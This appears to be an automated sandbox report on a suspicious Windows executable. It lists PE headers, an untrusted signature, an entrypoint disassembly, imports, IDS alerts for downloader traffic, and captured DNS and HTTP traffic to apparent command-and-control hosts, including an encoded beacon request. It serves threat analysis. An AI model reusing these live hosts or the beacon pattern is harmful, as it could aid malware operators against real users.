Time Stamp:	0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=immechanical, O=immechanical, L=Montiers, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	26/07/2024 11:01:31 26/07/2027 11:01:31
Subject Chain	CN=immechanical, O=immechanical, L=Montiers, C=FR
Version:	3
Thumbprint MD5:	8DCDBA681539229FD7339C836C203A51
Thumbprint SHA-1:	9C6E1EF295C999DBD8E2212BF532CD5F5E425BC0
Thumbprint SHA-256:	E345B14576959ED8D4BF59A4660594FC647CCA9157F84BFFB114D15B60339C48
Serial:	313E1C1AB85C6CF76B122FEB885EF111CAA7CE29

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A8h]
call dword ptr [004080A4h]
cmp ax, 00000006h
je 00007F1534C242F3h
push ebx
call 00007F1534C27261h
cmp eax, ebx
je 00007F1534C242E9h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F1534C271DDh
push esi
call dword ptr [004080A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F1534C242CDh
push ebp
push 00000009h
call 00007F1534C27234h
push 00000007h
call 00007F1534C2722Dh
mov dword ptr [0042F404h], eax
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429828h
call dword ptr [00408174h]
push 0040A188h
push 0042EC00h
call 00007F1534C26E57h
call dword ptr [0040809Ch]
mov ebp, 00435000h
push eax
push ebp
call 00007F1534C26E45h
push ebx
call dword ptr [00408154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4b000	0x64f00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12cc18	0x22e0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6071	0x6200	86ec2a2da0012903b23e33f511180572	False	0.6687659438775511	data	6.434342820031866	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1352	0x1400	cd090b7c5bd9ae3da2a43d4f02ef98b7	False	0.4599609375	data	5.237297010093776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x254f8	0x600	e98382d1559cdefaafaf45200fe1faf0	False	0.4544270833333333	data	4.037252180314336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x1b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4b000	0x64f00	0x65000	4b35ddad0638afdc14d8651f31f9f72e	False	0.5893022896039604	data	6.144636705094013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x4b400	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x4b768	0x4180c	Device independent bitmap graphic, 255 x 510 x 32, image size 260100	English	United States	0.5566530003727171
RT_ICON	0x8cf78	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.6340796167041287
RT_ICON	0x9d7a0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.6664652091654404
RT_ICON	0xa6c48	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.6956188001889466
RT_ICON	0xaae70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.6902489626556016
RT_ICON	0xad418	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.724437148217636
RT_ICON	0xae4c0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.7479508196721312
RT_ICON	0xaee48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.799645390070922
RT_DIALOG	0xaf2b0	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0xaf3f8	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0xaf538	0x100	data	English	United States	0.5234375
RT_DIALOG	0xaf638	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0xaf758	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xaf820	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xaf880	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0xaf8f8	0x2c8	data	English	United States	0.5084269662921348
RT_MANIFEST	0xafbc0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-06T16:10:51.193850+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49753	TCP
2024-11-06T16:11:29.888003+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49926	TCP
2024-11-06T16:11:29.973578+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49927	188.40.95.144	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 16:11:28.768946886 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.768976927 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:28.769068003 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.780911922 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.780921936 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.657499075 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.657598972 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.708969116 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.708998919 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.709355116 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.709409952 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.713604927 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.755340099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973598957 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973630905 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973704100 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.973727942 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.974431038 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.090436935 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.090507030 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.108393908 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.108469963 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.224955082 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.225029945 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.226656914 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.226733923 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.342242956 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.342363119 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.343491077 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.343590021 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.459671974 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.459764004 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.460283041 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.460346937 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.576864004 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.577044964 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.578058004 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.578149080 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.693831921 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.693994045 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.694691896 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.694760084 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.811450005 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.811522007 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.811695099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.811753988 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.812539101 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.812597990 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.928647995 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928831100 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.928858995 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928873062 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928920984 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.045684099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.045768023 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.045856953 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.045918941 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.046528101 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.046591043 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.162657022 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.162900925 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.163398027 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.163460970 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.163692951 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.163753033 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.279798985 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.279913902 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.280013084 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.280071020 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.280838013 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.281049013 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.397082090 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.397152901 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.397691965 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.397759914 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.398647070 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.398708105 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516211987 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516320944 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516426086 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516480923 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516498089 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516556978 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.633235931 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.633323908 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.633493900 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.633542061 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.634280920 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.634358883 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.634495020 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.649395943 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.649420023 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.649429083 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.652431965 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:12:25.578471899 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.583801985 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:25.583904982 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.592947960 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.598653078 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524735928 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524777889 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524784088 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524796963 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524802923 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524808884 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524815083 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524828911 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524976015 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:26.681191921 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.681324005 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:26.683489084 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:26.688236952 CET	80	49985	194.58.112.174	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 16:11:28.557219028 CET	53943	53	192.168.2.6	1.1.1.1
Nov 6, 2024 16:11:28.763389111 CET	53	53943	1.1.1.1	192.168.2.6
Nov 6, 2024 16:12:25.464119911 CET	61751	53	192.168.2.6	1.1.1.1
Nov 6, 2024 16:12:25.571099043 CET	53	61751	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 6, 2024 16:11:28.557219028 CET	192.168.2.6	1.1.1.1	0xb39	Standard query (0)	familytherapycenter.rs	A (IP address)	IN (0x0001)	false
Nov 6, 2024 16:12:25.464119911 CET	192.168.2.6	1.1.1.1	0x5ba6	Standard query (0)	www.svarus.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 6, 2024 16:11:28.763389111 CET	1.1.1.1	192.168.2.6	0xb39	No error (0)	familytherapycenter.rs		188.40.95.144	A (IP address)	IN (0x0001)	false
Nov 6, 2024 16:12:25.571099043 CET	1.1.1.1	192.168.2.6	0x5ba6	No error (0)	www.svarus.online		194.58.112.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

familytherapycenter.rs

www.svarus.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49985	194.58.112.174	80	3916	C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 6, 2024 16:12:25.592947960 CET	427	OUT	GET /sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA= HTTP/1.1 Host: www.svarus.online Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Nov 6, 2024 16:12:26.524735928 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 06 Nov 2024 15:12:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 [TRUNCATED] Data Ascii: 24e1<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.svarus.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg.ru" [TRUNCATED]
Nov 6, 2024 16:12:26.524777889 CET	1236	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f Data Ascii: div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.svarus.online</h1><p class="b-parking__header-d
Nov 6, 2024 16:12:26.524784088 CET	1236	IN	Data Raw: bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hosting"><
Nov 6, 2024 16:12:26.524796963 CET	1236	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 20 62 2d Data Ascii: div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://www.reg.ru/hosting/?utm_
Nov 6, 2024 16:12:26.524802923 CET	1236	IN	Data Raw: 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97 d0 b0 d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 Data Ascii: campaign=s_land_server&reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact"> </str
Nov 6, 2024 16:12:26.524808884 CET	1236	IN	Data Raw: 67 6e 3d 73 5f 6c 61 6e 64 5f 66 73 73 6c 26 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 9f d0 be d0 bb d1 83 d1 87 d0 b8 d1 82 d1 8c 20 53 53 4c 3c 2f 61 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 Data Ascii: gn=s_land_fssl&reg_source=parking_auto"> SSL</a><p class="b-text b-parking__promo-description l-margin_top-small l-margin_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop">
Nov 6, 2024 16:12:26.524815083 CET	1236	IN	Data Raw: 68 72 65 66 20 2b 20 27 3f 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 20 3d 20 6c 69 6e 6b 73 5b 20 69 20 5d Data Ascii: href + '?'; } links[ i ].href = links[ i ].href + 'rid=' + data.ref_id; } } } var script = document.createElement('script'); var head = document.ge
Nov 6, 2024 16:12:26.524828911 CET	952	IN	Data Raw: 20 74 20 5d 20 3d 20 74 65 78 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 20 73 70 61 6e 73 5b 20 69 20 5d 2e 63 6c 61 73 73 4e 61 6d 65 2e 6d 61 74 63 68 28 20 2f 5e 6e 6f 2d 70 75 6e 79 2f 20 29 20 29 20 7b 0a Data Ascii: t ] = text; } else if ( spans[ i ].className.match( /^no-puny/ ) ) { spans[ i ].style.display = 'none'; } } }</script>... Yandex.Metrika counter --><script type="text/javascript">(function(

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
